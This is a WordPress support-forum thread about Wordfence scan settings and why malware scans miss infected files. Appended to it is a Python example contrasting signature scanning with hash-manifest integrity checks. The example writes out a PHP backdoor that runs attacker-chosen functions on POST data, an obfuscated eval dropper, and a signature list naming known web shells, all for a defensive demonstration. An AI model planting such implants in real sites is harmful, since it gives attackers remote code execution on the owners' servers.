Viewing 7 replies - 1 through 7 (of 7 total)
  • Hi

    Can you screenshot the options page for me and attach it (blank out key and email, of course)

    tim

    Thread Starter Kaarel Veike

    (@kaarelveike)

    Hi, Tim

    You can download the screenshot from here. Everything should be on default. Didn’t change anything there:
    Google Drive link

    Best,

    Kaarel

    For starters, you have absolutely no firewall rules or login security going. If anything does get blocked it is only blocked for 5 minutes. I would highly advise changing that. I am emailing you screenshots of both sets that I use on production sites.

    I also advise scanning theme and plugin files against the WordPress repository for changes, as that catches those files that have been altered or added to.

    The following are go-to options I add to all my production sites, many of which I did not see enabled on your site.

    • Scan for signatures of known malicious files
    • Scan file contents for backdoors, trojans and suspicious code
    • Scan options table
    • Scan files outside your WordPress installation
    • Scan image files as if they were executable
    • Disable Code Execution for Uploads directory

    Wordfence is pretty good out of the box but it does require setting options if you want to catch everything.

    Let me know if you had any other questions. I am always happy to help.

    tim

    Hey Tim,

    We could all benefit from the advice you gave Kaarel.

    Could you make the screenshots of suggested settings available for me/others to refer to as well.

    Cheers and thanks

    Kat

    @kat These are all on the options page. The first five are in the “Scans to Include” section. The last is under “Other Options”. I also highly recommend “Scan plugin files against repository versions for changes”, “Scan theme files against repository versions for changes”, and “Scan core files against repository versions for changes” in the “Scans to Include” section.

    tim

    Hey Tim,

    I found the six items mentioned in the text of your reply post to @kaarel.

    So the Screenshots you refer to in your msg to @kaarel only show those six items and the few extras you mentioned in post text above…

    If that’s the case, I got it covered. Just didn’t want to miss out on anything extra showing in the screenshots.

    Thanks again, much appreciated.

    Thread Starter Kaarel Veike

    (@kaarelveike)

    These settings definitely help with blocking further attacks, but I still can’t stop thinking about the question. I scanned the site and it only found 9% of the malicious files. To be fair, this 9% was the best result I got, because my hosting company SiteGround scanned the site and said it’s clean. In my reply I pointed out a malicious file and asked why they didn’t find that file. This time their reply took a lot longer; they said that the file was malicious and asked if I would like to order a paid service to go over the files, but gave no reply or explanation as to why they use scanning which doesn’t work. I also learned that a hosting provider in Estonia (ZONE.eu) scanned and found about 1% of the malicious files. These past few weeks I have worked on so many hacked sites that it’s pretty terrifying. How could you be sure that your site is clean of malware if the scans fail to find malicious files? Some files are easily recognizable as malicious, but I found some files that looked like part of the system. And I also bumped into something similar on one of the sites to what they describe in this article: https://www.csoonline.com/article/2921138/malware-cybercrime/unusual-wordpress-attack-steals-login-credentials.html

    I can’t imagine how many sites might actually be infected if the hosting provider, security plugins and outside scans fail to report the problem.

    So my question was that why don’t the scans recognize the malicious files? How could people help these programs become smarter?
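    Tim’s repository-comparison advice and Kaarel’s question about why scans miss files that “look like part of the system” come down to the same point: a signature scan only finds what it already has a pattern for, while an integrity check against known-good file hashes flags anything altered or added regardless of what it contains. The script below is an added example written for this thread; it is not Wordfence’s, SiteGround’s or WordPress’s own code. It builds a small constructed WordPress-like tree with a hypothetical core file, appends an implant to that file, drops an obfuscated PHP file into uploads, and then compares three approaches: a literal-signature list, a handful of content heuristics, and a manifest comparison. The file contents, the manifest and the signature/heuristic lists are all constructed for the example; on a real site the manifest would come from the wordpress.org checksum data (for core, `wp core verify-checksums` does this comparison for you).

```python
"""Why integrity checks catch what signature scans miss (added example, constructed data)."""
import hashlib
import re
import tempfile
from pathlib import Path

# Constructed literal-signature list, standing in for a naive "known bad strings" scanner.
SIGNATURES = [b"FilesMan", b"c99shell", b"r57shell", b"eval(base64_decode("]

# Constructed content heuristics: constructs common in obfuscated PHP droppers.
HEURISTICS = [
    ("eval", re.compile(rb"\beval\s*\(", re.I)),
    ("base64_decode", re.compile(rb"\bbase64_decode\s*\(", re.I)),
    ("gzinflate", re.compile(rb"\bgzinflate\s*\(", re.I)),
    ("str_rot13", re.compile(rb"\bstr_rot13\s*\(", re.I)),
    ("variable_function", re.compile(rb"\$[A-Za-z_]\w*\s*\(")),  # $f(...) call by name
]

# Hypothetical file contents. CLEAN_CORE is the "known good" version in the manifest.
CLEAN_CORE = b"<?php\n// constructed stand-in for a core file\nfunction wp_dummy() { return 1; }\n"
# Implant appended to a core file: runs a caller-chosen function on decoded POST data.
IMPLANT = b"\n<?php if (isset($_POST['k'])) { $f = $_POST['k']; $f(base64_decode($_POST['d'])); } ?>\n"
# Dropped into uploads: str_rot13('riny') is 'eval', so the literal word never appears.
DROPPER = b"<?php $a = str_rot13('riny'); @$a(gzinflate(base64_decode('H4sI'))); ?>\n"


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_tree(root, manifest, extensions=(".php",)):
    """Compare files under root with a known-good manifest {relpath: sha256}.
    Returns sorted lists of modified, added (only the given extensions) and missing files."""
    root = Path(root)
    seen = {p.relative_to(root).as_posix(): sha256_file(p) for p in root.rglob("*") if p.is_file()}
    return {
        "modified": sorted(r for r, h in manifest.items() if r in seen and seen[r] != h),
        "added": sorted(r for r in seen if r not in manifest and r.endswith(extensions)),
        "missing": sorted(r for r in manifest if r not in seen),
    }


def signature_scan(content):
    """Names of literal signatures present in content (empty list = 'clean' to this scanner)."""
    return [s.decode() for s in SIGNATURES if s in content]


def flag_suspicious(content):
    """Names of heuristics that matched, in HEURISTICS order."""
    return [name for name, pat in HEURISTICS if pat.search(content)]


def build_sample_site(root):
    """Write the constructed tree, then tamper with it. Returns the known-good manifest."""
    root = Path(root)
    (root / "wp-includes").mkdir(parents=True)
    (root / "wp-content/uploads/2015/05").mkdir(parents=True)
    core = root / "wp-includes/class-wp-dummy.php"
    core.write_bytes(CLEAN_CORE)
    manifest = {
        "wp-includes/class-wp-dummy.php": hashlib.sha256(CLEAN_CORE).hexdigest(),
        "wp-includes/version.php": hashlib.sha256(b"<?php $wp_version = '4.2.2';\n").hexdigest(),
    }
    # Tampering: append an implant to the core file, drop a PHP file into uploads,
    # and leave version.php absent so the manifest also reports a missing file.
    core.write_bytes(CLEAN_CORE + IMPLANT)
    (root / "wp-content/uploads/2015/05/cache.php").write_bytes(DROPPER)
    return manifest


def run_demo():
    """Returns (integrity report, per-file scanner results) for the constructed site."""
    with tempfile.TemporaryDirectory() as tmp:
        manifest = build_sample_site(tmp)
        report = verify_tree(tmp, manifest)
        scans = {}
        for rel in report["modified"] + report["added"]:
            data = (Path(tmp) / rel).read_bytes()
            scans[rel] = {"signatures": signature_scan(data), "heuristics": flag_suspicious(data)}
    return report, scans


if __name__ == "__main__":
    rep, scans = run_demo()
    for key in ("modified", "added", "missing"):
        print(f"{key}: {rep[key]}")
    for rel, result in scans.items():
        print(f"{rel}: signatures={result['signatures']} heuristics={result['heuristics']}")
```

Both tampered files pass the signature list (the dropper never even contains the word `eval`), the heuristics flag both but would also flag plenty of legitimate plugin code that calls `base64_decode` or variable functions, and only the manifest comparison reports exactly which core file changed and which PHP file appeared where none should be. That is the case for the “against repository versions” options: they need no prior knowledge of the malware, only of the clean install. The heuristic list is deliberately small and is not a substitute for a maintained scanner.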

  • The topic ‘Scan only recognizes about 10% of the malicious files’ is closed to new replies.